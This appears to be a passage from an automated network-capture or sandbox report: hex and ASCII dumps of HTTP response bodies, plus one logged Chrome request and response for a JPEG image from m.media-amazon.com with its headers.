                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 1a 89 d0 d7 c3 4d bd bd e9 ab 87 d2 e2 ad 9c 25 85 24 18 52 49 92 38 c1 04 f1 56 fd 51 9b 57 f4 cb 96 af 36 8b 77 1b 52 1c 2a 31 09 ae 56 2c bf 79 d6 54 b4 6a 76 b0 ca ff 00 51 01 2a d2 c1 57 96 2d 59 e9 1a 6b e8 b8 47 a8 b7 43 69 01 09 00 19 00 0c 8c 80 3e 75 4c fb 6d b3 b7 d2 7a 21 87 b4 f6 5b b3 79 57 c8 49 72 dd 21 b5 14 94 a8 91 29 00 c4 80 63 d8 55 97 ec cd f6 de d0 d6 14 ee fb 86 d5 e9 c2 bf 69 2d 8f d9 10 78 e6 82 7d bb 34 17 d1 56 a4 e5 09 d4 5b 52 92 0c 12 90 93 31 ef 14 74 b1 6c 13 15 ab a8 55 69 a8 7b 4f 9f 13 a8 df 28 28 27 51 bc de 04 90 5f 56 44 66 04 f9 a8 e3 55 d4 41 00 ea 17 86 73 22 e1 5f ce 9b 2a 05 6e 2d 7b 89 00 89 03 f0 34 da d0 50 12 b2 01 04 09 10 41 07 c1 07 da ae 4a b1 f5 6a ba 96 ec 6a 17 a0 47 7b 85 7f 3a e0 d5 b5 2c ce a3 79
                                                                                                                                                                                          Data Ascii: M%$RI8VQW6wR*1V,yTjvQ*W-YkGCi>uLmz![yWIr!)cUi-x}4V[R1tlUi{O(('Q_VDfUAs"_*n-{4PAJjjG{:,y
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 8c a7 1b 67 cf 2a 21 6d a1 40 92 a2 08 30 32 23 83 f2 82 29 e4 dc 24 32 11 b3 76 f4 14 b8 a5 19 93 32 0f d2 00 a6 50 b4 b3 0a 0b 85 48 29 23 91 e6 90 e0 20 04 85 03 24 91 88 93 56 62 fe f1 49 79 61 1b 26 11 b8 a8 e3 93 c5 21 43 24 82 63 33 3c 73 5e 92 95 14 90 04 12 33 9a eb 60 2c 80 08 03 38 26 0e 08 fe 75 32 27 59 40 71 50 54 1b 24 c2 49 e2 7b 03 e3 3d eb ab 00 ad 44 02 82 06 40 24 93 d8 c1 35 d6 03 6a 0f 29 66 14 90 08 11 81 9c cf f5 de b8 b5 a9 24 85 0d a3 76 41 10 41 e4 1c fc eb a4 fb 46 a3 74 94 88 02 01 15 65 e8 9f 87 5b 77 02 0d b2 bb 7f e2 4d 00 0e 90 a5 a5 52 43 b9 3f 0c 49 e4 7c a6 ad 1d 22 95 a7 5a 7a 01 2d a5 85 00 42 4e 09 52 4c 7e ff 00 c2 a2 46 20 7d 60 c6 a3 78 90 20 9b 87 0c 1f 3b 8e 47 89 14 3c 49 1b 41 98 e0 76 1e 6a 76 a8 07 e9 7b d2
                                                                                                                                                                                          Data Ascii: g*!m@02#)$2v2PH)# $VbIya&!C$c3<s^3`,8&u2'Y@qPT$I{=D@$5j)f$vAAFte[wMRC?I|"Zz-BNRL~F }`x ;G<IAvjv{
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 49 c7 bc 6d f7 d6 b6 d2 ca e1 41 a0 52 d1 22 21 32 4c 63 9e 67 33 4d 38 e2 8a 82 a7 e3 40 00 2b 12 46 79 3d cf 14 92 a2 52 42 b0 49 1d b2 29 30 39 24 c4 c6 79 9f 1f 3a e9 06 49 b2 bb 43 17 49 5b ed 07 1b 4a 48 29 e3 b6 0e 38 83 07 19 c5 5a ba 55 a3 fa 49 c5 a9 c0 77 34 ad c9 27 83 29 fc 47 83 e2 a9 ec b2 b7 d4 5b 6d 25 4a 3c 00 39 1d ff 00 0a bc f4 d6 e3 74 c8 5a 94 a7 17 6e e2 81 4e 01 48 5a 44 0f 20 12 7f 1a 83 c4 91 d7 32 b1 ab 02 75 6b d5 80 36 fd e5 60 c7 00 85 1c 1f df 5c bd 47 f7 90 dc 80 08 05 24 02 12 01 12 0c 78 a7 2f 94 4e ad a8 34 a2 02 17 70 e0 24 89 83 b8 c1 a6 5e 75 4b 69 01 6b 90 93 b5 0a 23 30 07 06 a6 40 ea 25 90 59 71 c0 a2 01 29 29 1d e6 46 2a 22 b1 89 30 3b f8 34 e2 d5 09 4a 4e 0a 24 03 f3 33 4d aa 62 32 00 9a 29 07 e0 4e a0 99 90 0c
                                                                                                                                                                                          Data Ascii: ImAR"!2Lcg3M8@+Fy=RBI)09$y:ICI[JH)8ZUIw4')G[m%J<9tZnNHZD 2uk6`\G$x/N4p$^uKik#0@%Yq))F*"0;4JN$3Mb2)N
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ac 88 0a 27 70 12 4f 23 1e 20 fe 35 d8 3d c9 04 0e 22 6e d0 84 2d 2a 09 da 0c 15 20 63 69 3c c4 ff 00 ad 46 5c 85 28 02 48 24 12 08 e7 e7 52 e6 d5 16 e4 29 2b 71 6e 09 49 2a 10 9c 9c 40 ef f3 a8 64 84 94 94 92 0c cc ff 00 03 44 0c 13 f6 92 ed 1d 69 ab 7b 9f 83 73 cb 01 08 51 24 14 a4 9f 88 88 ef 18 f9 55 a3 a2 1d b4 3a 85 ea 1d 27 d5 43 69 0c 9c c6 c1 85 7e 61 15 50 61 69 69 c4 3a 46 f0 15 25 04 60 8f 18 f3 56 1e 8c 52 57 d4 17 04 0d a0 db a8 80 3b 7c 49 a1 91 07 ea 48 73 f4 bd f1 4a 14 40 b8 59 24 0e 3e 23 9a 89 0a 24 85 18 82 09 24 60 03 44 b5 15 28 6a d7 bb 9e 21 21 e7 08 1c c9 dc 60 54 7f bb 38 f3 8d 95 b4 af 88 4a 80 30 08 1e fe 78 c5 1e 67 63 e2 46 0c 2d 65 63 69 94 82 41 89 24 09 c7 e1 4d 7a 6a 58 84 a5 44 9e c0 49 1e f4 49 21 f4 5c a1 48 42 d4 5a
                                                                                                                                                                                          Data Ascii: 'pO# 5="n-* ci<F\(H$R)+qnI*@dDi{sQ$U:'Ci~aPaii:F%`VRW;|IHsJ@Y$>#$$`D(j!!`T8J0xgcF-eciA$MzjXDII!\HBZ
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 4e 25 d7 02 48 50 c1 20 00 72 0f 7e f1 44 5b fb 30 d7 48 d8 e2 ec b6 83 22 56 4c 7c b0 2a f3 6b f4 b5 fa 4b 81 8f bc ac 68 bd ce e2 bc ca 8a 9f 4d c9 43 8f 2e 1e 44 24 92 27 78 10 00 3e fe f5 1d c5 25 2f ed 92 a0 14 44 46 23 b1 f7 83 9a b7 6a 1f 66 fd 43 6e d9 75 96 ad df 08 48 80 ca ce e3 1e 01 e6 ab 0e a1 2a bb 50 2c 90 da 7f 69 0b 3b 54 92 04 11 ed 9f dd 4e a7 53 55 c3 35 b0 31 76 54 e9 f9 c6 23 4c 80 85 4b c8 dc d9 90 64 41 33 c1 3f 23 48 5b 4e 36 b5 05 04 93 81 10 20 f8 fe bc 1a 9a 19 45 c3 45 c0 54 52 92 12 ea 47 02 7f c4 09 3d ff 00 7d 39 72 c4 5a ad 24 a4 a1 a2 14 82 08 06 09 82 0f 72 47 3e d4 f0 46 62 f6 f1 04 a9 45 b5 92 08 04 08 91 c1 ab 2f 44 a4 8d 65 c5 41 08 55 ba 88 3e fb 93 35 5c 79 05 48 44 6d 3b 84 88 39 11 e7 de ac dd 10 0a f5 07 8e 46
                                                                                                                                                                                          Data Ascii: N%HP r~D[0H"VL|*kKhMC.D$'x>%/DF#jfCnuH*P,i;TNSU51vT#LKdA3?#H[N6 EETRG=}9rZ$rG>FbE/DeAU>5\yHDm;9F
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 00 bc aa 25 d5 30 a0 82 9c a4 ed 52 66 02 87 79 23 27 3c 52 b7 7a a8 25 23 60 6d 61 50 09 24 03 99 9f 68 a4 b8 d0 07 24 6f 26 40 03 1f 8f 71 ef 52 ec 7e ee 2d fd 50 54 a7 d4 b2 da 99 24 04 a9 b8 90 64 f0 67 c9 af 6b c7 73 cf f3 9c 48 77 4e 7a eb 71 d3 05 6a 51 2a db c4 fc bb 4d 59 ba 3d 6a 3a b3 c2 41 fe ef 2a 20 00 26 52 00 c0 ce 01 cd 57 10 c2 17 7a 96 7d 40 59 24 12 a4 88 81 e0 fb f6 e6 ac dd 2f ff 00 19 52 d2 d8 4b 4b b5 21 2a 48 30 a2 95 00 49 f7 ce 6a 73 04 83 ef 03 6a a9 07 57 bd 58 50 01 2f 2f 1d c9 dc 7f 29 a8 0a 20 aa 48 80 4c 90 2a 76 a6 a2 9d 62 ee 52 49 fb c3 84 02 30 41 51 15 00 93 ea 80 a9 30 72 47 8f 6a 98 26 4b b6 71 a0 d4 3c 49 42 54 48 1d 80 3c 93 e6 b9 b9 2a b8 6d 09 4a 51 b5 d4 9d c0 c8 22 46 73 d8 54 68 00 4c 8d a0 82 7d e9 6a 56 f0
                                                                                                                                                                                          Data Ascii: %0Rfy#'<Rz%#`maP$h$o&@qR~-PT$dgksHwNzqjQ*MY=j:A* &RWz}@Y$/RKK!*H0IjsjWXP//) HL*vbRI0AQ0rGj&Kq<IBTH<*mJQ"FsThL}jV
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: a5 75 3d ed bd 92 ac ed ee 5f b7 74 28 ac 36 60 25 3e 52 64 4c 1c c1 a8 5a 9e b9 7d 7c d2 94 bb eb 85 5a 85 0d c9 51 92 09 ec 23 be 39 a3 d2 78 4d da 6d 51 b1 1b d3 f1 f6 83 66 aa ab 29 da f0 3e a2 d1 43 a9 dc b4 ad 5b 48 56 d1 84 90 78 9e f5 c6 1a 5a 2d fd 49 09 06 1a 24 10 41 56 48 91 c7 03 bf 33 4d bc b2 ea c2 99 46 d4 ac 10 25 59 f9 19 e4 e2 b8 cd c3 82 d9 d6 56 a4 a5 b7 d6 14 55 b7 21 49 e0 88 f9 9a f4 98 38 98 d9 19 cc f2 56 ab 77 d2 b6 8a 4b 8a 49 0e 26 04 01 30 71 e2 33 9a b0 f4 8a 03 7a bb 88 dd bd 1f 77 52 92 ac c1 95 27 b7 d3 9a 03 7a fa 5e 4e f4 00 80 b5 7e b0 00 24 91 de 7c 1f 03 8a 33 d1 52 35 67 3e 2e 6d d4 76 f8 f8 93 5d f7 82 7e 24 0d 49 24 6a 9a 83 bc 94 dc 2c 03 38 12 a3 50 5c 42 92 ac 88 24 48 33 82 0d 4d d5 95 1a a5 ea 44 91 eb 38 48
                                                                                                                                                                                          Data Ascii: u=_t(6`%>RdLZ}|ZQ#9xMmQf)>C[HVxZ-I$AVH3MF%YVU!I8VwKI&0q3zwR'z^N~$|3R5g>.mv]~$I$j,8P\B$H3MD8H
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: f6 fe 74 63 a8 1e fc c5 5c 34 a6 d8 b6 da a0 a6 9c 49 50 50 ee 67 20 89 30 45 1f e8 a4 05 6a 4e b8 54 82 43 2a 4e d2 a8 23 e2 49 f1 91 40 10 b6 d5 6e 5a 74 a8 a1 04 94 28 76 27 b7 ca 8f f4 6a 14 d6 b4 e0 3d ed 94 41 8e 7e 24 e6 bb da 0b 7d a0 dd 45 82 e6 a9 7c b0 b0 3f bc b8 36 93 93 f1 1e 3d aa 00 42 c3 84 70 26 08 07 31 de a5 6a cb 50 d5 ef 60 91 17 0e 01 07 ff 00 11 a8 33 27 10 3c 19 a2 83 98 f2 88 08 2b 94 6e 51 30 3b 81 e6 3d e9 6a 29 68 0d 81 45 44 7c 45 51 c9 ec 05 36 d4 24 87 54 84 a8 03 89 ee 45 36 e3 85 d5 95 1e 09 91 15 10 b2 31 f7 8f 33 b9 6e 12 97 12 85 27 e2 04 f7 cf 03 de 9e 3b 84 90 01 2a 30 a0 89 99 f6 3e 2a 32 1a 96 fd 52 b4 a4 4f c2 09 c9 f3 14 b4 94 a2 24 e4 12 54 09 c7 18 1e f5 06 12 fd e4 c6 de 71 6e a1 d7 08 6d c5 0d a1 49 00 a4 81
                                                                                                                                                                                          Data Ascii: tc\4IPPg 0EjNTC*N#I@nZt(v'j=A~$}E|?6=Bp&1jP`3'<+nQ0;=j)hED|EQ6$TE613n';*0>*2RO$TqnmI
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ae e6 49 c6 78 9e 91 85 40 24 1f c6 bc 33 24 c0 93 c7 f0 af 49 29 23 33 da 2b 80 e4 cc 13 c7 15 32 22 8c ab b9 03 c4 f1 48 db 07 91 c5 2f 07 83 26 22 b8 48 e6 3b 45 74 ee e2 48 20 7f 58 af 46 20 72 4f 26 bd 38 8a e8 32 49 27 9a 89 d8 9c 88 e0 cc 71 52 f4 8d 35 cd 5f 57 b4 d3 d0 e0 6d 77 2e 06 d2 b5 09 09 3e 48 a8 b8 03 32 33 da 88 e8 3a 8b 7a 3f 50 58 ea 4e b6 a7 5b b7 74 2c a1 26 09 11 18 a5 5a 58 56 4a 77 ed 0d 00 2c 33 d4 3d ad 7d 9d 6a 7a 4d 90 ba 66 e1 9b c4 fa 81 b5 21 b4 94 a8 28 98 c0 3c 89 ef 52 db fb 30 be d8 94 2b 52 b0 37 e5 1b 85 92 a6 49 89 8d c3 bd 14 d7 3e d0 b4 bb bd 31 4d da 25 ff 00 5c 3a 1d 6c b9 92 92 0c 80 23 8f 1f 2a e3 3d 73 d3 77 77 cc eb 57 76 4f 37 ab 32 8c 27 71 f4 ca a2 37 00 3b ff 00 0a c2 1a 8f 12 f2 c1 23 e7 d8 7e df b4 d7
                                                                                                                                                                                          Data Ascii: Ix@$3$I)#3+2"H/&"H;EtH XF rO&82I'qR5_Wmw.>H23:z?PXN[t,&ZXVJw,3=}jzMf!(<R0+R7I>1M%\:l#*=swwWvO72'q7;#~


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          102192.168.2.1649839151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:12 UTC453OUTGET /images/M/MV5BOGMyNWJhZmYtNGQxYi00Y2ZjLWJmNjktNTgzZWJjOTg4YjM3L2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 36494
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: eef56ae8-0241-4424-a8f7-1b35f508d26c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 01 Feb 2017 18:19:00 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 03 Nov 2044 22:39:49 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          Age: 2835626
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200067-IAD, cache-ewr-kewr1740028-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 cc 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 00 01 02 08 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f4 fe 6f 03 9e b3 a0 e7 3a c0 e7 37 b0 d6 f7
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"3o:7
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 55 43 d9 3c 61 c4 d1 7f 86 36 e9 c7 59 ac 58 cc bd 1f 17 88 59 b5 69 68 b4 9c 7e d0 e3 af a0 55 49 5f 5b 99 2a 2a f5 a8 4d f1 72 32 b8 d8 72 ab 87 fb 89 9b 7a 7a 3a c0 5c 9e cc 95 69 69 98 22 a6 ae 75 02 18 cb 22 e9 bb ad 77 68 42 ed 3a 48 48 f9 a4 2d 34 98 63 31 83 22 71 82 bd 74 49 c4 4a 43 0d 61 91 80 52 60 4d 2b 0e 55 1a b1 b1 19 f5 e7 5d d8 f1 8b e0 3f be c6 55 3d 3a a2 4a fa 31 4a a1 b7 a9 5c df 27 b1 3a f3 00 73 01 26 94 88 48 3a 89 ab 4f dd 6a 47 cf d3 0a b1 01 99 d8 92 d8 52 da ef 16 49 46 c8 7e 6d ad b9 ee 28 35 93 5e 9a ac 59 68 d0 a4 87 8c e6 99 c3 4e b5 a3 89 bb e9 34 28 5f 91 28 f3 50 d2 8c 9d 46 81 07 9e 8b 98 e0 70 f7 0c be b1 5b 85 7d 38 25 52 5b b5 8a 37 95 b7 34 af 66 d8 b4 79 6a a2 33 40 c5 c2 cd 8d 31 b7 e4 f0 07 81 15 93 28 78 7b dc
                                                                                                                                                                                          Data Ascii: UC<a6YXYih~UI_[**Mr2rzz:\ii"u"whB:HH-4c1"qtIJCaR`M+U]?U=:J1J\':s&H:OjGRIF~m(5^YhN4(_(PFp[}8%R[74fyj3@1(x{
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 32 a0 35 b0 2d 83 77 a1 1c cc 0c cc c0 cc cc 0c ce 44 81 8c 88 f0 13 1c 86 a2 13 74 62 ac 40 c4 92 33 25 0f ff c4 00 31 10 00 02 02 01 03 03 04 01 03 04 02 03 01 01 00 00 01 02 00 03 11 04 12 21 10 13 31 05 22 32 41 14 23 33 51 15 20 30 42 24 40 06 61 71 34 50 ff da 00 08 01 01 00 01 08 02 ff 00 f9 d8 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 ff 00 37 a9 bb 22 a6 de f5 a6 35 d7 4f ca b4 46 b6 d6 19 1d fb a0 be d9 de b2 77 ec 9d d7 9d cb 27 75 e1 ba c9 dd b2 77 1e 52 ed bb 11 99 a3 3b 4d ed 16 d3 37 99 b8 c0 22 73 36 63 ab 38 5f 29 60 62 40 db 0a cc 4c 4c 4c 41 f5 d7 d6 3e 15 c5 33 e5 2d aa 29 c4 c6 f8 57 11 fa 03 8e a0 4c 79 9e 20 25 48 2a 9a 9d df 26 e8 04 58 16 62 50 82 08 7a 5c 3f 5a 93 1f 77 7e b2 45 ea 73 0e a5 67 74 08 b7 86 20 75 1d 7d 5f
                                                                                                                                                                                          Data Ascii: 25-wDtb@3%1!1"2A#3Q 0B$@aq4P7"5OFw'uwR;M7"s6c8_)`b@LLLA>3-)WLy %H*&XbPz\?Zw~Esgt u}_
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: e2 5b 2e fb bb 5f 9d 66 38 d2 51 b0 ef 39 9a 93 ff 00 29 e5 27 72 0c 62 6a e8 de 01 14 6a 1f 89 94 bd 7b 95 e3 a1 99 89 cc fc 60 81 4b 5b b3 dd 2b da 4c 22 bf 9c db 5a c4 d8 49 59 b1 43 08 d0 c4 f8 af 5f 5f fd aa e7 98 dd 4d 67 89 da 87 6a 71 16 cf a8 34 d9 07 71 a7 95 02 dd 47 77 20 6e 2b 13 50 eb cc 7f 52 b0 71 2a b4 5a 40 8f ad ed 1e 07 ac 29 f2 7d 4a a2 26 a9 49 51 6c d3 ea 4a d8 8c cd 66 4f 1b 11 ce 16 c5 2b 0c 4f 31 53 70 20 6d 0b 90 57 69 c8 1d c5 9b 93 e8 58 93 ba b9 8d 18 44 f8 af 5f 5f fd aa e3 40 b3 64 ad 40 8d 76 46 21 db f5 e2 0a 4b c5 de be 36 93 e6 b5 9a 7a 33 c9 03 f8 7e 51 81 1b ab 65 89 ed bc 66 c3 e6 71 1f 9f 37 e9 cd 6d 89 53 31 08 a3 51 51 0d 93 56 a7 c2 b3 d7 b7 cd 35 ee ce 10 2a f0 2c 3b 7c 6f cc cc 33 3d 0c 31 3c 2f 5f 5f fd aa e6
                                                                                                                                                                                          Data Ascii: [._f8Q9)'rbjj{`K[+L"ZIYC__Mgjq4qGw n+PRq*Z@)}J&IQlJfO+O1Sp mWiXD__@d@vF!K6z3~Qefq7mS1QQV5*,;|o3=1</__
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 16 78 98 fb 8d 17 c2 f5 f5 83 fa 69 1b 98 67 8e 61 19 8b ff 00 bd 37 ba c0 16 b1 b3 da ba 95 cd 2e b5 8a 5c 02 59 3f da 2f 1c 44 18 10 10 32 4d b6 92 25 87 84 8d cc d3 fd c7 9a d1 80 a6 79 f7 4f a1 2b e7 33 f8 12 9c 13 b6 5c 08 38 09 bc fb c6 a8 82 c8 63 70 31 10 6e 38 80 7f a8 23 1e 0f 54 f8 af 5f 59 fd a5 99 3c c3 57 f0 b5 34 29 89 b0 f3 00 1c 4a c3 fb 56 33 db 5e 33 f9 28 c0 c3 c7 13 c9 10 1e 23 9f a8 ff 00 cc 6e 14 66 69 f8 2d 0c d4 ae e4 30 f0 b3 6c 5e 9b f1 88 af e1 56 ab 0e f9 af b1 77 85 56 db ce 73 c0 dc 9a ab 37 a8 5b 75 88 87 04 5a b6 fc 44 31 3e 2b d7 d6 bf 69 23 71 37 95 30 58 d1 58 af 22 8b 82 e4 32 76 c6 e1 05 ab a7 4c 20 3b d7 2d 65 65 5b 05 d0 e6 03 f5 0f d8 96 73 c8 68 47 88 de 65 1f 32 21 8c 37 8c 46 fa 10 8f 13 38 8a 73 2c af f8 54 89
                                                                                                                                                                                          Data Ascii: xiga7.\Y?/D2M%yO+3\8cp1n8#T_Y<W4)JV3^3(#nfi-0l^VwVs7[uZD1>+i#q70XX"2vL ;-ee[shGe2!7F8s,T
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 29 5b f7 06 e9 af f4 f1 6e 6c 4f cd fc 81 da d5 59 e9 69 6a 25 72 df 4f ee 8c 35 da 0a 34 61 5d c6 8c ea 88 b3 53 81 fd 47 02 bf 4d b3 4a d9 d3 b7 a6 9b dc 3d ff 00 f5 cf f7 ea 34 35 6a 0e e7 fe 91 a7 fa d3 e9 85 39 c5 17 8b 75 c4 d8 cc 10 12 da 15 37 dd 66 ab fe a1 38 06 7e a6 dc 4f d4 cc af 7f bb 70 ee 0d b0 77 b6 88 c1 fd d8 b0 59 ce df d5 f7 41 dc e2 20 7f f6 5e ef b7 35 f7 72 37 75 d5 7a 52 5e 4b 84 f4 ee 07 7b fc 84 85 04 92 c0 1c 4d e3 38 9b c6 76 c0 ea 7c 1e 21 70 3c f7 96 77 17 93 0b 01 c1 b4 87 db 87 af 0e c6 6c f6 30 9b 50 10 c1 aa 18 81 01 2d 9e d6 61 a4 59 98 68 63 89 4d 7d b5 09 0b 81 9c ef 10 5a a6 77 16 77 16 6f 10 da 82 1b 14 67 3b c4 07 3e 3f bb ba bc ce f2 4b 19 1f 88 fb 09 0c 76 8d f9 16 5b 5d 9e e2 15 37 08 b5 a2 ed db 55 a9 56 42 84
                                                                                                                                                                                          Data Ascii: )[nlOYij%rO54a]SGMJ=45j9u7f8~OpwYA ^5r7uzR^K{M8v|!p<wl0P-aYhcM}Zwwog;>?Kv[]7UVB
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 5d 28 4a df ab fd a6 22 ea 5c dc ad 98 1a fa 6f cc 02 aa 13 b8 0f 52 ee a1 c9 46 64 62 c6 26 c1 83 18 b8 f4 ba 97 70 77 04 6e 8c 17 0f 28 3a 8d 88 30 30 71 4b 00 1d ca b9 42 e0 5d c3 a3 19 a5 ee 07 0b 65 40 66 3c e7 20 49 04 e1 e2 20 6b 83 a9 90 fc 0c 5c bf 99 ee 03 b0 1c 41 33 a0 0e 22 ac 59 44 c2 6a 18 f0 83 0f e0 c5 0a 77 2c 03 0b d9 97 f2 30 75 32 fd 8d 39 d7 61 b8 88 32 ef 43 c9 71 3d d6 2f 64 66 8a e2 e0 78 4c 0d 51 9a e5 18 cf 5a 0a c4 28 e4 cd 66 e0 1a b8 5f e5 70 75 e8 71 21 ec f8 38 8c 7f 0b fe 87 c6 cd 5a 3e 26 50 6e 07 3d 30 c8 47 6b 92 e8 c2 e6 c4 66 a4 31 17 29 17 19 ce b9 1b 2d a3 e4 51 a8 33 d9 a3 91 aa 84 06 0e 87 ef 2a 0f 7e ca 91 53 e9 94 68 12 ca dc 59 30 80 b6 c3 22 9e 86 54 7d 2b 78 78 da 1f d3 8d eb fa 6e 43 0f 8d 98 58 23 c5 cb ca
                                                                                                                                                                                          Data Ascii: ](J"\oRFdb&pwn(:00qKB]e@f< I k\A3"YDjw,0u29a2Cq=/dfxLQZ(f_puq!8Z>&Pn=0Gkf1)-Q3*~ShY0"T}+xxnCX#
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 1c 5f 72 8e 2f b8 a8 e2 fb 8a f1 22 fb 8a f1 22 fb 8a 8e 2f b8 a8 e2 fb 8a 8e 2f b8 a8 e2 fb 8a 88 fd c5 44 7e e2 a3 8b ee 2a 38 be e2 a3 8b ee 2a 23 bc a2 77 a8 8e f5 11 de 89 de 8f c0 ae 14 f8 5e ae 99 b5 f8 63 76 75 33 69 e6 0f a4 af a4 44 ed 39 1a 3e b2 ae 5d de b4 f0 57 fe f3 bd 5d 3e 28 cc bb e1 07 7a ea 50 c9 f5 77 25 0f 7f 8e 28 20 83 63 9d ea f8 70 0d 6a 56 cd a8 80 a7 c1 dd ee 8d 2a 8d 38 a8 9d 47 df 72 51 5c a2 ef bb d4 4e cd 9d ea e9 f0 88 9d b5 5b 56 e0 a4 ee fd 1f 32 7a 10 b3 e5 15 38 7e 50 61 73 fd 4a fa ae e4 c8 b7 2f 55 14 55 0b f7 95 3f d2 3d d7 5d f5 46 9d e0 b1 39 de ae 9f 0e 59 97 aa 1b 90 ce a4 1f 2f 87 71 d7 ed 7a 9d a2 40 85 0f 6f f9 50 a8 7b a2 86 52 ec 28 71 ce f5 74 f8 97 0c e3 98 7d 9a 8c aa 26 fc 25 9a 3b ef 7a 1d ef b3 13 a1
                                                                                                                                                                                          Data Ascii: _r/""//D~*8*#w^cvu3iD9>]W]>(zPw%( cpjV*8GrQ\N[V2z8~PasJ/UU?=]F9Y/qz@oP{R(qt}&%;z
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 3b 01 6f ab a2 fd db 43 c1 1d 45 19 c5 53 7a 1e 5b cd e9 a6 cc 39 2d 0b b9 3d 9b 14 e2 35 28 c8 54 e6 5c be a2 b6 7b e6 56 c3 5b f9 2f 51 df 45 75 da fd ec 89 da b1 fa 74 0b 2b 6e 02 df 57 45 45 fb b0 23 b5 7e 94 87 a9 c7 99 7d 47 6c ac fa 48 e5 65 cb 6c 5e c8 30 62 da 07 e6 db ac fa 84 bb d3 6d d9 9d f6 56 33 ea 8e 4b 51 34 f0 54 39 b8 0b 7d 5d 33 bf 6a 1c 93 a1 ba c8 6b 53 97 23 3d bc d4 2c 06 25 ac ef f7 65 07 16 cc c7 a5 98 ae ce 67 e7 bd ea 7a 6f 50 99 5f 76 95 23 37 06 f5 fa 45 b4 e0 ae cd c0 5b ea e9 9d 2d 38 28 be 93 e6 d3 77 77 a2 e0 d5 be b5 b9 81 e0 6a af 57 b2 bc 45 c1 52 10 af b7 47 5b 34 2b f3 40 84 00 6f 5a 1c 3b d3 aa 69 03 3e 8b 2b 73 f1 4e 46 a5 b9 73 cc c0 5b eb e8 6d 36 50 aa 15 0b 85 42 d2 c1 5d 65 c8 df bb 37 0b 30 cf c6 a8 57 a2 81
                                                                                                                                                                                          Data Ascii: ;oCESz[9-=5(T\{V[/QEut+nWEE#~}GlHel^0bmV3KQ4T9}]3jkS#=,%egzoP_v#7E[-8(wwjWERG[4+@oZ;i>+sNFs[m6PB]e70W
